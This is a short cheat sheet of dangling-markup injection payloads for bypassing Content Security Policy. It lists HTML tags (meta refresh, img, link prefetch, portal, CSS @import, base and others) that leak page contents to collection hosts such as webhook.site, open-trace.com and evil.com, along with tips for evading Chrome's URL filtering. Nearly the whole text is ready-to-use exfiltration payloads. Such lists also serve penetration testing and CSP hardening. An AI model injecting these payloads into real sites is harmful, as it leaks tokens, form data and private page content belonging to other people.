Dangling Markup - CSP Bypass

📚 Resources

• hacktricks best examples
• Github Resource Best Payloads

Payloads

• dangling-markup-payloads.txt

Dangling Markup

This exploit involves exfiltrating an HTML page to bypass CSP filters.

To exploit this, you can use a webhook to intercept the request with the resource in URL or in the GET parameter.

The request is sent with the HTML content forged in request as :

https://webhook.site/URL/?<HTML_CONTENT>

Payloads

<meta http-equiv="refresh" content='0;URL=https://webhook.site/URL/?
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?content=

<head profile="//webhook.site/URL/

<body background='open-trace.com/create-request/URL/?

<portal src='//webhook.site/URL/?

<link rel="prefetch" href='//open-trace.com/create-request/URL/?

<img src='//webhook.site/URL/

Chrome

Note that Chrome blocks HTTP URLs with < or \n in it, so you could try other protocol schemes like FTP.

You can also abuse CSS @import (will send all the code until it find a ;)

<style>@import//webhook.site?     <--- Injected
<b>steal me!</b>;

You could also use <table:

<table background='//webhook.site/URL/?

You can also insert a <base tag. However, user interaction is required (they must click).

<base href='http://webhook.site/URL/'>

<base target='        <--- Injected
steal me'<b>test</b>

User interaction

Click :

<a href='https://webhook.site/URL/?'>Click me to edit form !</a><base target='